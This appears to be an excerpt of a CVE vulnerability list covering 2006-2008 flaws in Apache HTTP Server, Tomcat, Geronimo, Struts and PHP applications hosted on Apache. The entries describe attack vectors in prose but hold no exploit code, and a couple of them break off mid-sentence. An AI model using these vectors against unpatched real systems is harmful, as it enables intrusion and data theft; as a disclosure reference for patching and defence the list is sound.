8939| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
8940| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
8941| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
8942| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
8943| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
8944| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
8945| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
8946| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
8947| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
8948| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
8949| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
8950| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
8951| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
8952| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
8953| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
8954| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
8955| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
8956| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8957| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
8958| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
8959| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
8960| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
8961| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
8962| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
8963| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
8964| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
8965| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
8966| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
8967| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
8968| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
8969| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
8970| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8971| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
8972| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
8973| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
8974| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
8975| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
8976| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
8977| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
8978| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
8979| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
8980| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
8981| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
8982| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
8983| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
8984| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
8985| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
8986| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
8987| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
8988| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
8989| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
8990| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
8991| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
8992| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
8993| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
8994| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
8995| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
8996| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
8997| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
8998| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
8999| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
9000| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
9001| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
9002| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
9003| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
9004| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
9005| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
9006| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
9007| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
9008| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
9009| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
9010| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
9011| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
9012| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
9013| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
9014| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
9015| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
9016| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
9017| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
9018| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
9019| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
9020| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
9021| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
9022| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
9023| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
9024| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
9025| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
9026| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
9027| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
9028| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
9029| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
9030| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
9031| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
9032| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
9033| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
9034| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
9035| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
9036| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
9037| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
9038| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
9039| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
9040| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
9041| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
9042| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
9043| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
9044| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
9045| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
9046| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
9047| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
9048| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
9049| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
9050| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
9051| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
